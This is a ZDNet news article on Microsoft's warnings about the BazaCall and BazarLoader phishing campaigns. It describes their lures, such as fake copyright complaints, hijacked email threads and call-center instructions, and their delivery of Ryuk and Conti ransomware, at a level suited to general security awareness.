Microsoft ramps up warnings about an apparent low-tech attacker that’s adopting more sophisticated techniques.
By | August 12, 2021 — 12:04 GMT (13:04 BST) | Topic: Security
Microsoft’s Security Intelligence team is once again raising an alarm about the call center phishing and malware group behind what it calls BazaCall. 
«We are tracking multiple active email campaigns that use BazarLoader to deliver a wide range of payloads. These campaigns appear disparate but share a common trait: their tactics attempt to challenge conventional email security solutions and best practices,» Microsoft said in a tweet.
The best cyber insurance
The cyber insurance industry is likely to go mainstream and is a simple cost of doing business. Here are a few options to consider.
Read More
The ‘Stolen Images’ Bazarloader campaign uses fake copyright infingement contact form emails and malicious files pretending to contain «stolen images» to trick users into downloading the malware.
SEE: Malware developers turn to ‘exotic’ programming languages to thwart researchers
Another technique is to trick potential victims into opening emails from what they think are trusted sources.
«A recent campaign challenges the best practice of only opening emails from known contacts: it uses compromised accounts to hijack email threads and attach a Word document in a password-protected ZIP file. The doc has a macro that launches MSHTA to download BazarLoader,» Microsoft said.
Microsoft first raised an alarm about BazaCall in June because of its unusual and relatively expensive techniques, which relied on phishing emails with claims about expired trial subscriptions and impending payments. 
The emails stand out because they don’t include links to web pages: instead, the emails encourage potential targets to contact a call center at which point the operator provides instructions to install malware under the guise of helping to cancel the fake payment. 
The installed backdoor allows BazaCall actors to install ransomware, including but not limited to Ryuk and Conti. 
Its tactics are notable because they don’t use phishing links or send malicious attachments, helping avoid traditional email filter and detection systems. 
The first point of contact is a call center operator who discusses the expiring subscription detailed in the email. The operator then recommends the victim visit a website where they can supposedly cancel the subscription to avoid future monthly fees.
«BazarLoader is a first-stage malware that allows remote attackers to gain control over an affected device, exfiltrate data, and install ransomware payloads – notably Conti. The multi-component and evasive nature of these attacks requires comprehensive protection,» Microsoft notes. 
SEE: This new phishing attack is ‘sneakier than usual’, Microsoft warns
In a GitHub post, Microsoft outlines that the group uses copyright material as a lure. 
BazaCall is not a new threat. Security firm FireEye raised an alarm about BazarLoader in December and prior to that TrendMicro spotted a campaign spreading the BazarLoader backdoor and Ryuk ransomware.  
By | August 12, 2021 — 12:04 GMT (13:04 BST) | Topic: Security
Windows 10: Microsoft just revealed another Print Spooler bug
Microsoft: Here’s how Office, Teams and Outlook work on Samsung’s foldable phones
Now Google Meet is saying goodbye to IE 11, too
Microsoft fixes Windows 10 PrintNightmare flaw with this update
Please review our terms of service to complete your newsletter subscription.
By registering, you agree to the Terms of Use and acknowledge the data practices outlined in the Privacy Policy.
You will also receive a complimentary subscription to the ZDNet’s Tech Update Today and ZDNet Announcement newsletters. You may unsubscribe from these newsletters at any time.
You agree to receive updates, alerts, and promotions from the CBS family of companies – including ZDNet’s Tech Update Today and ZDNet Announcement newsletters. You may unsubscribe at any time.
By signing up, you agree to receive the selected newsletter(s) which you may unsubscribe from at any time. You also agree to the Terms of Use and acknowledge the data collection and usage practices outlined in our Privacy Policy.
Cornell University researchers discover ‘code-poisoning’ attack
The attack would allow people to compromise email accounts, affect machine learning models and more.
Windows 10: Microsoft just revealed another Print Spooler bug
Microsoft discloses a new PrintNightmare bug and advises admins to disable the Print Spooler service to mitigate the issue.
Private Internet Access review: A cheap, powerful VPN
Overall, we were impressed with Private Internet Access — as long as you’re not trying to connect to India. It’s well worth taking a look.
Japanese manufacturer Murata apologizes for data breach
A subcontractor downloaded a database with sensitive bank account information from employees and business partners of the company.
Apple releases massive mystery bug fix update for Macs
macOS Big Sur 11.5.2 is out, and it’s a huge update. But we have no idea what it fixes.
Attacks against industrial networks will become a bigger problem. We need to fix security now
There’s very few opportunities in cybersecurity where you get the benefit of foresight. This could be one.
Singapore SMBs keen on cyber insurance, most anxious about data security
Often lacking in resources, small and midsize businesses see cyber insurance as a way to balance cost and the need to safeguard their infrastructure, especially as data leaks are …
Why Australia’s Online Safety Act is an abdication of responsibility
It’s the government’s actual job to protect our rights and freedoms, but when it comes to online it simply can’t be bothered.
Labor tries the Senate after ransomware payments Bill flops in the House of Reps
The Bill that would require entities to inform the Australian government before they make a ransomware payment has been introduced to the Senate.
© 2021 ZDNET, A RED VENTURES COMPANY. ALL RIGHTS RESERVED. Privacy Policy | Cookie Settings | Advertise | Terms of Use


Por redditxxx